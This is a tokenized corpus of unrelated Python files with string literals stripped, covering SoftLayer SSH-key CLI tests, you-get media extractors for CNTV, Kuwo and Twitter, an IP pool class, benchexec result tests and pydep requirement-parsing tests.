<EOL> for item in package_items : <EOL> is_private = str ( item [ '<STR_LIT:description>' ] ) . 
startswith ( '<STR_LIT>' ) <EOL> for price in item [ '<STR_LIT>' ] : <EOL> if '<STR_LIT>' in price and price [ '<STR_LIT>' ] : <EOL> continue <EOL> if '<STR_LIT>' not in price : <EOL> continue <EOL> categories = price [ '<STR_LIT>' ] <EOL> for category in categories : <EOL> if not ( category [ '<STR_LIT>' ] == category_code <EOL> and str ( item [ '<STR_LIT>' ] ) == str ( value ) ) : <EOL> continue <EOL> if option == '<STR_LIT>' : <EOL> if public and not is_private : <EOL> return price [ '<STR_LIT:id>' ] <EOL> elif not public and is_private : <EOL> return price [ '<STR_LIT:id>' ] <EOL> elif option == '<STR_LIT>' : <EOL> if '<STR_LIT>' in item [ '<STR_LIT:description>' ] : <EOL> return price [ '<STR_LIT:id>' ] <EOL> else : <EOL> return price [ '<STR_LIT:id>' ] </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import os . path <EOL> import tempfile <EOL> import mock <EOL> from SoftLayer import testing <EOL> class SshKeyTests ( testing . TestCase ) : <EOL> def test_add_by_option ( self ) : <EOL> service = self . client [ '<STR_LIT>' ] <EOL> mock_key = service . getObject ( ) [ '<STR_LIT:key>' ] <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' % mock_key , <EOL> '<STR_LIT>' ] ) <EOL> self . assertEqual ( result . exit_code , <NUM_LIT:0> ) <EOL> self . assertEqual ( json . loads ( result . output ) , <EOL> "<STR_LIT>" ) <EOL> self . assert_called_with ( '<STR_LIT>' , '<STR_LIT>' , <EOL> args = ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:key>' : mock_key , <EOL> '<STR_LIT:label>' : '<STR_LIT>' } , ) ) <EOL> def test_add_by_file ( self ) : <EOL> path = os . path . join ( testing . FIXTURE_PATH , '<STR_LIT>' ) <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' % path ] ) <EOL> self . assertEqual ( result . exit_code , <NUM_LIT:0> ) <EOL> self . assertEqual ( json . loads ( result . output ) , <EOL> "<STR_LIT>" ) <EOL> service = self . client [ '<STR_LIT>' ] <EOL> mock_key = service . getObject ( ) [ '<STR_LIT:key>' ] <EOL> self . assert_called_with ( '<STR_LIT>' , '<STR_LIT>' , <EOL> args = ( { '<STR_LIT>' : None , <EOL> '<STR_LIT:key>' : mock_key , <EOL> '<STR_LIT:label>' : '<STR_LIT>' } , ) ) <EOL> def test_remove_key ( self ) : <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( result . exit_code , <NUM_LIT:0> ) <EOL> self . assert_called_with ( '<STR_LIT>' , '<STR_LIT>' , <EOL> identifier = <NUM_LIT> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_remove_key_fail ( self , ngb_mock ) : <EOL> ngb_mock . return_value = False <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( result . 
exit_code , <NUM_LIT:2> ) <EOL> def test_edit_key ( self ) : <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( result . exit_code , <NUM_LIT:0> ) <EOL> self . assert_called_with ( '<STR_LIT>' , '<STR_LIT>' , <EOL> args = ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:label>' : '<STR_LIT>' } , ) , <EOL> identifier = <NUM_LIT> ) <EOL> def test_edit_key_fail ( self ) : <EOL> fixture = self . set_mock ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> fixture . return_value = False <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( result . exit_code , <NUM_LIT:2> ) <EOL> def test_list_keys ( self ) : <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT:list>' ] ) <EOL> self . assertEqual ( result . exit_code , <NUM_LIT:0> ) <EOL> self . assertEqual ( json . loads ( result . output ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT:->' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:id>' : '<STR_LIT:100>' , <EOL> '<STR_LIT:label>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:label>' : '<STR_LIT>' } ] ) <EOL> def test_print_key ( self ) : <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( result . exit_code , <NUM_LIT:0> ) <EOL> self . assertEqual ( json . loads ( result . output ) , <EOL> { '<STR_LIT:id>' : <NUM_LIT> , '<STR_LIT:label>' : '<STR_LIT:label>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_print_key_file ( self ) : <EOL> with tempfile . NamedTemporaryFile ( ) as sshkey_file : <EOL> service = self . client [ '<STR_LIT>' ] <EOL> mock_key = service . getObject ( ) [ '<STR_LIT:key>' ] <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' % sshkey_file . name ] ) <EOL> self . assertEqual ( result . 
exit_code , <NUM_LIT:0> ) <EOL> self . assertEqual ( mock_key , sshkey_file . read ( ) . decode ( "<STR_LIT:utf-8>" ) ) </s>
<s> """<STR_LIT>""" <EOL> from simplegist import * <EOL> __author__ = '<STR_LIT>' <EOL> __version__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' </s>
<s> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> from . . common import * <EOL> import json <EOL> import re <EOL> def cntv_download_by_id ( id , title = None , output_dir = '<STR_LIT:.>' , merge = True , info_only = False ) : <EOL> assert id <EOL> info = json . loads ( get_html ( '<STR_LIT>' + id ) ) <EOL> title = title or info [ '<STR_LIT:title>' ] <EOL> video = info [ '<STR_LIT>' ] <EOL> alternatives = [ x for x in video . keys ( ) if x . endswith ( '<STR_LIT>' ) ] <EOL> chapters = video [ '<STR_LIT>' ] if '<STR_LIT>' in video else video [ '<STR_LIT>' ] <EOL> urls = [ x [ '<STR_LIT:url>' ] for x in chapters ] <EOL> ext = r1 ( r'<STR_LIT>' , urls [ <NUM_LIT:0> ] ) <EOL> assert ext in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> size = <NUM_LIT:0> <EOL> for url in urls : <EOL> _ , _ , temp = url_info ( url ) <EOL> size += temp <EOL> print_info ( site_info , title , ext , size ) <EOL> if not info_only : <EOL> download_urls ( urls , title , ext , size , output_dir = output_dir , merge = False ) <EOL> def cntv_download ( url , output_dir = '<STR_LIT:.>' , merge = True , info_only = False , ** kwargs ) : <EOL> if re . match ( r'<STR_LIT>' , url ) : <EOL> id = match1 ( url , r'<STR_LIT>' ) <EOL> elif re . match ( r'<STR_LIT>' , url ) or re . match ( r'<STR_LIT>' , url ) : <EOL> id = r1 ( r'<STR_LIT>' , get_html ( url ) ) <EOL> elif re . match ( r'<STR_LIT>' , url ) : <EOL> id = r1 ( r'<STR_LIT>' , url ) <EOL> else : <EOL> raise NotImplementedError ( url ) <EOL> cntv_download_by_id ( id , output_dir = output_dir , merge = merge , info_only = info_only ) <EOL> site_info = "<STR_LIT>" <EOL> download = cntv_download <EOL> download_playlist = playlist_not_supported ( '<STR_LIT>' ) </s>
<s> __all__ = [ '<STR_LIT>' ] <EOL> from . . common import * <EOL> import re <EOL> def kuwo_download_by_rid ( rid , output_dir = '<STR_LIT:.>' , merge = True , info_only = False ) : <EOL> html = get_content ( "<STR_LIT>" % rid ) <EOL> title = match1 ( html , r"<STR_LIT>" ) <EOL> url = get_content ( "<STR_LIT>" % rid ) <EOL> songtype , ext , size = url_info ( url ) <EOL> print_info ( site_info , title , songtype , size ) <EOL> if not info_only : <EOL> download_urls ( [ url ] , title , ext , size , output_dir ) <EOL> def kuwo_playlist_download ( url , output_dir = '<STR_LIT:.>' , merge = True , info_only = False , ** kwargs ) : <EOL> html = get_content ( url ) <EOL> matched = set ( re . compile ( "<STR_LIT>" ) . findall ( html ) ) <EOL> for rid in matched : <EOL> kuwo_download_by_rid ( rid , output_dir , merge , info_only ) <EOL> def kuwo_download ( url , output_dir = '<STR_LIT:.>' , merge = True , info_only = False , ** kwargs ) : <EOL> if "<STR_LIT>" in url : <EOL> rid = match1 ( url , '<STR_LIT>' ) <EOL> kuwo_download_by_rid ( rid , output_dir , merge , info_only ) <EOL> else : <EOL> kuwo_playlist_download ( url , output_dir , merge , info_only ) <EOL> site_info = "<STR_LIT>" <EOL> download = kuwo_download <EOL> download_playlist = kuwo_playlist_download </s>
<s> __all__ = [ '<STR_LIT>' ] <EOL> from . . common import * <EOL> from . vine import vine_download <EOL> def twitter_download ( url , output_dir = '<STR_LIT:.>' , merge = True , info_only = False , ** kwargs ) : <EOL> html = get_html ( url ) <EOL> screen_name = r1 ( r'<STR_LIT>' , html ) or r1 ( r'<STR_LIT>' , html ) <EOL> item_id = r1 ( r'<STR_LIT>' , html ) or r1 ( r'<STR_LIT>' , html ) <EOL> page_title = "<STR_LIT>" . format ( screen_name , item_id ) <EOL> try : <EOL> urls = re . findall ( r'<STR_LIT>' , html ) <EOL> assert urls <EOL> images = [ ] <EOL> for url in urls : <EOL> url = '<STR_LIT::>' . join ( url . split ( '<STR_LIT::>' ) [ : - <NUM_LIT:1> ] ) + '<STR_LIT>' <EOL> filename = parse . unquote ( url . split ( '<STR_LIT:/>' ) [ - <NUM_LIT:1> ] ) <EOL> title = '<STR_LIT:.>' . join ( filename . split ( '<STR_LIT:.>' ) [ : - <NUM_LIT:1> ] ) <EOL> ext = url . split ( '<STR_LIT::>' ) [ - <NUM_LIT:2> ] . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> size = int ( get_head ( url ) [ '<STR_LIT>' ] ) <EOL> images . append ( { '<STR_LIT:title>' : title , <EOL> '<STR_LIT:url>' : url , <EOL> '<STR_LIT>' : ext , <EOL> '<STR_LIT:size>' : size } ) <EOL> size = sum ( [ image [ '<STR_LIT:size>' ] for image in images ] ) <EOL> print_info ( site_info , page_title , images [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , size ) <EOL> if not info_only : <EOL> for image in images : <EOL> title = image [ '<STR_LIT:title>' ] <EOL> ext = image [ '<STR_LIT>' ] <EOL> size = image [ '<STR_LIT:size>' ] <EOL> url = image [ '<STR_LIT:url>' ] <EOL> print_info ( site_info , title , ext , size ) <EOL> download_urls ( [ url ] , title , ext , size , <EOL> output_dir = output_dir ) <EOL> except : <EOL> if not re . match ( r'<STR_LIT>' , url ) : <EOL> url = r1 ( r'<STR_LIT>' , html ) <EOL> if not url : <EOL> url = '<STR_LIT>' % item_id <EOL> html = get_content ( url ) <EOL> data_config = r1 ( r'<STR_LIT>' , html ) or r1 ( r'<STR_LIT>' , html ) <EOL> i = json . 
loads ( unescape_html ( data_config ) ) <EOL> if '<STR_LIT>' in i : <EOL> source = i [ '<STR_LIT>' ] <EOL> if not item_id : page_title = i [ '<STR_LIT>' ] <EOL> elif '<STR_LIT>' in i : <EOL> source = i [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:source>' ] <EOL> if not item_id : page_title = i [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> elif '<STR_LIT>' in i : <EOL> vmap_url = i [ '<STR_LIT>' ] <EOL> vmap = get_content ( vmap_url ) <EOL> source = r1 ( r'<STR_LIT>' , vmap ) <EOL> if not item_id : page_title = i [ '<STR_LIT>' ] <EOL> mime , ext , size = url_info ( source ) <EOL> print_info ( site_info , page_title , mime , size ) <EOL> if not info_only : <EOL> download_urls ( [ source ] , page_title , ext , size , output_dir , merge = merge ) <EOL> site_info = "<STR_LIT>" <EOL> download = twitter_download <EOL> download_playlist = playlist_not_supported ( '<STR_LIT>' ) </s>
<s> import unittest <EOL> from you_get import * <EOL> from you_get . extractors import * <EOL> from you_get . common import * <EOL> class YouGetTests ( unittest . TestCase ) : <EOL> def test_freesound ( self ) : <EOL> freesound . download ( "<STR_LIT>" , info_only = True ) <EOL> def test_imgur ( self ) : <EOL> imgur . download ( "<STR_LIT>" , info_only = True ) <EOL> imgur . download ( "<STR_LIT>" , info_only = True ) <EOL> def test_magisto ( self ) : <EOL> magisto . download ( "<STR_LIT>" , info_only = True ) <EOL> def test_mixcloud ( self ) : <EOL> mixcloud . download ( "<STR_LIT>" , info_only = True ) <EOL> def test_vimeo ( self ) : <EOL> vimeo . download ( "<STR_LIT>" , info_only = True ) <EOL> def test_youtube ( self ) : <EOL> youtube . download ( "<STR_LIT>" , info_only = True ) <EOL> youtube . download ( "<STR_LIT>" , info_only = True ) <EOL> youtube . download ( "<STR_LIT>" , info_only = True ) </s>
<s> import os <EOL> from setuptools import setup , find_packages <EOL> here = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> with open ( os . path . join ( here , '<STR_LIT>' ) ) as f : <EOL> README = f . read ( ) <EOL> requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = README , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> keywords = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> zip_safe = False , <EOL> install_requires = requires , <EOL> tests_require = requires , <EOL> test_suite = "<STR_LIT>" , <EOL> entry_points = """<STR_LIT>""" , ) </s>
<s> import ipaddress <EOL> class IPPool ( object ) : <EOL> _pool = [ ] <EOL> _capacity = None <EOL> def __init__ ( self , network ) : <EOL> if isinstance ( network , str ) : <EOL> network = network . decode ( ) <EOL> self . _network = ipaddress . ip_network ( network ) <EOL> self . _hosts = self . _network . hosts ( ) <EOL> def _next_host ( self ) : <EOL> for host in self . _hosts : <EOL> if host in self . _pool : <EOL> continue <EOL> return host <EOL> def register ( self , address ) : <EOL> addr = ipaddress . ip_address ( address ) <EOL> if addr in self . _pool : <EOL> raise RegisteredException ( ) <EOL> self . _pool . append ( addr ) <EOL> def apply ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _capacity is not None and len ( self . _pool ) == self . _capacity : <EOL> return <EOL> addr = self . _next_host ( ) <EOL> if addr is None : <EOL> self . reset ( ) <EOL> addr = self . _next_host ( ) <EOL> if addr is None : <EOL> if self . _capacity is None : <EOL> self . _capacity = len ( self . _pool ) <EOL> else : <EOL> self . _pool . append ( addr ) <EOL> return addr <EOL> def unregister ( self , address ) : <EOL> addr = ipaddress . ip_address ( address ) <EOL> try : <EOL> self . _pool . remove ( addr ) <EOL> except ValueError : <EOL> pass <EOL> def reset ( self ) : <EOL> self . _hosts = self . _network . hosts ( ) <EOL> class RegisteredException ( Exception ) : <EOL> pass </s>
<s> from __future__ import absolute_import , division , print_function , unicode_literals <EOL> import logging <EOL> import sys <EOL> import unittest <EOL> sys . dont_write_bytecode = True <EOL> from benchexec . util import ProcessExitCode <EOL> from benchexec . model import Run <EOL> from benchexec . result import * <EOL> from benchexec . tools . template import BaseTool <EOL> normal_result = ProcessExitCode ( raw = <NUM_LIT:0> , value = <NUM_LIT:0> , signal = None ) <EOL> class TestResult ( unittest . TestCase ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . longMessage = True <EOL> logging . disable ( logging . CRITICAL ) <EOL> def create_run ( self , info_result = RESULT_UNKNOWN ) : <EOL> runSet = lambda : None <EOL> runSet . log_folder = '<STR_LIT:.>' <EOL> runSet . options = [ ] <EOL> runSet . real_name = None <EOL> runSet . propertyfile = None <EOL> runSet . benchmark = lambda : None <EOL> runSet . benchmark . base_dir = '<STR_LIT:.>' <EOL> runSet . benchmark . benchmark_file = '<STR_LIT>' <EOL> runSet . benchmark . columns = [ ] <EOL> runSet . benchmark . name = '<STR_LIT>' <EOL> runSet . benchmark . instance = '<STR_LIT>' <EOL> runSet . benchmark . rlimits = { } <EOL> runSet . benchmark . tool = BaseTool ( ) <EOL> def determine_result ( self , returncode , returnsignal , output , isTimeout = False ) : <EOL> return info_result <EOL> runSet . benchmark . tool . determine_result = determine_result <EOL> return Run ( sourcefiles = [ '<STR_LIT>' ] , fileOptions = [ ] , runSet = runSet ) <EOL> def test_simple ( self ) : <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( RESULT_UNKNOWN , run . _analyse_result ( normal_result , '<STR_LIT>' , False , None ) ) <EOL> run = self . create_run ( info_result = RESULT_TRUE_PROP ) <EOL> self . assertEqual ( RESULT_TRUE_PROP , run . _analyse_result ( normal_result , '<STR_LIT>' , False , None ) ) <EOL> run = self . 
create_run ( info_result = RESULT_FALSE_REACH ) <EOL> self . assertEqual ( RESULT_FALSE_REACH , run . _analyse_result ( normal_result , '<STR_LIT>' , False , None ) ) <EOL> def test_timeout ( self ) : <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , True , None ) ) <EOL> run = self . create_run ( info_result = RESULT_TRUE_PROP ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , True , None ) ) <EOL> run = self . create_run ( info_result = RESULT_FALSE_REACH ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , True , None ) ) <EOL> run = self . create_run ( info_result = '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , True , None ) ) <EOL> def test_out_of_memory ( self ) : <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , False , '<STR_LIT>' ) ) <EOL> run = self . create_run ( info_result = RESULT_TRUE_PROP ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , False , '<STR_LIT>' ) ) <EOL> run = self . create_run ( info_result = RESULT_FALSE_REACH ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , False , '<STR_LIT>' ) ) <EOL> run = self . create_run ( info_result = '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , False , '<STR_LIT>' ) ) <EOL> def test_timeout_and_out_of_memory ( self ) : <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , True , '<STR_LIT>' ) ) <EOL> run = self . create_run ( info_result = RESULT_TRUE_PROP ) <EOL> self . 
assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , True , '<STR_LIT>' ) ) <EOL> run = self . create_run ( info_result = RESULT_FALSE_REACH ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , True , '<STR_LIT>' ) ) <EOL> run = self . create_run ( info_result = '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , False , '<STR_LIT>' ) ) <EOL> def test_returnsignal ( self ) : <EOL> def signal ( sig ) : <EOL> """<STR_LIT>""" <EOL> return ProcessExitCode ( raw = sig , value = None , signal = sig ) <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( signal ( <NUM_LIT:9> ) , '<STR_LIT>' , True , None ) ) <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( signal ( <NUM_LIT:9> ) , '<STR_LIT>' , False , '<STR_LIT>' ) ) <EOL> run = self . create_run ( info_result = RESULT_TRUE_PROP ) <EOL> self . assertEqual ( RESULT_TRUE_PROP , run . _analyse_result ( signal ( <NUM_LIT:9> ) , '<STR_LIT>' , False , None ) ) <EOL> run = self . create_run ( info_result = RESULT_FALSE_REACH ) <EOL> self . assertEqual ( RESULT_FALSE_REACH , run . _analyse_result ( signal ( <NUM_LIT:9> ) , '<STR_LIT>' , False , None ) ) <EOL> run = self . create_run ( info_result = '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( signal ( <NUM_LIT:9> ) , '<STR_LIT>' , False , None ) ) <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( signal ( <NUM_LIT:9> ) , '<STR_LIT>' , False , None ) ) <EOL> def test_exitcode ( self ) : <EOL> def returnvalue ( value ) : <EOL> """<STR_LIT>""" <EOL> return ProcessExitCode ( raw = value << <NUM_LIT:8> , value = value , signal = None ) <EOL> run = self . 
create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( returnvalue ( <NUM_LIT:1> ) , '<STR_LIT>' , True , None ) ) <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( returnvalue ( <NUM_LIT:1> ) , '<STR_LIT>' , False , '<STR_LIT>' ) ) <EOL> run = self . create_run ( info_result = RESULT_TRUE_PROP ) <EOL> self . assertEqual ( RESULT_TRUE_PROP , run . _analyse_result ( returnvalue ( <NUM_LIT:1> ) , '<STR_LIT>' , False , None ) ) <EOL> run = self . create_run ( info_result = RESULT_FALSE_REACH ) <EOL> self . assertEqual ( RESULT_FALSE_REACH , run . _analyse_result ( returnvalue ( <NUM_LIT:1> ) , '<STR_LIT>' , False , None ) ) <EOL> run = self . create_run ( info_result = '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( returnvalue ( <NUM_LIT:1> ) , '<STR_LIT>' , False , None ) ) <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( returnvalue ( <NUM_LIT:1> ) , '<STR_LIT>' , False , None ) ) </s>
<s> """<STR_LIT>""" <EOL> import benchexec . tools . template <EOL> import benchexec . result as result <EOL> class Tool ( benchexec . tools . template . BaseTool ) : <EOL> """<STR_LIT>""" <EOL> def executable ( self ) : <EOL> return '<STR_LIT>' <EOL> def name ( self ) : <EOL> return '<STR_LIT>' <EOL> def cmdline ( self , executable , options , tasks , propertyfile , rlimits ) : <EOL> return [ executable ] + tasks <EOL> def determine_result ( self , returncode , returnsignal , output , isTimeout ) : <EOL> return result . RESULT_FALSE_REACH </s>
<s> """<STR_LIT>""" <EOL> import benchexec . tools . template <EOL> import benchexec . result as result <EOL> class Tool ( benchexec . tools . template . BaseTool ) : <EOL> """<STR_LIT>""" <EOL> def executable ( self ) : <EOL> return '<STR_LIT>' <EOL> def name ( self ) : <EOL> return '<STR_LIT>' <EOL> def cmdline ( self , executable , options , tasks , propertyfile , rlimits ) : <EOL> return [ executable ] + tasks <EOL> def determine_result ( self , returncode , returnsignal , output , isTimeout ) : <EOL> return result . RESULT_TRUE_PROP </s>
<s> import unittest <EOL> from pip import req as req <EOL> from pydep . req import * <EOL> testdatadir = path . join ( path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> class TestRequirements ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . maxDiff = None <EOL> def test_requirements ( self ) : <EOL> """<STR_LIT>""" <EOL> expected0 = [ <EOL> { '<STR_LIT>' : ( ) , <EOL> '<STR_LIT:key>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : ( ) , <EOL> '<STR_LIT:key>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT:key>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> ] <EOL> testcases = [ <EOL> ( '<STR_LIT>' , expected0 ) , <EOL> ( '<STR_LIT>' , expected0 ) , <EOL> ( '<STR_LIT>' , expected0 ) , <EOL> ( '<STR_LIT>' , expected0 ) , <EOL> ( '<STR_LIT>' , expected0 ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , [ <EOL> { '<STR_LIT:key>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : None } , <EOL> { '<STR_LIT:key>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : 
'<STR_LIT>' , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , '<STR_LIT>' : None , '<STR_LIT>' : None } , <EOL> { '<STR_LIT>' : ( ) , <EOL> '<STR_LIT:key>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] } <EOL> ] ) , <EOL> ] <EOL> for testcase in testcases : <EOL> dir_ , exp = testcase [ <NUM_LIT:0> ] , testcase [ <NUM_LIT:1> ] <EOL> rootdir = path . join ( testdatadir , dir_ ) <EOL> reqs , err = requirements ( rootdir , resolve = False ) <EOL> if err is not None : <EOL> if exp != '<STR_LIT>' : <EOL> print ( '<STR_LIT>' , err ) <EOL> self . assertEqual ( exp , '<STR_LIT>' ) <EOL> else : <EOL> self . assertListEqual ( sorted ( exp , key = lambda x : x [ '<STR_LIT:key>' ] ) , sorted ( reqs , key = lambda x : x [ '<STR_LIT:key>' ] ) ) <EOL> def test_SetupToolsRequirement ( self ) : <EOL> testcases = [ <EOL> ( "<STR_LIT>" , { <EOL> '<STR_LIT>' : ( ) , <EOL> '<STR_LIT:key>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' <EOL> } ) , <EOL> ( "<STR_LIT>" , { <EOL> '<STR_LIT>' : ( '<STR_LIT:bar>' , ) , <EOL> '<STR_LIT:key>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' <EOL> } ) , <EOL> ] <EOL> for testcase in testcases : <EOL> req_str , exp_dict = testcase [ <NUM_LIT:0> ] , testcase [ <NUM_LIT:1> ] 
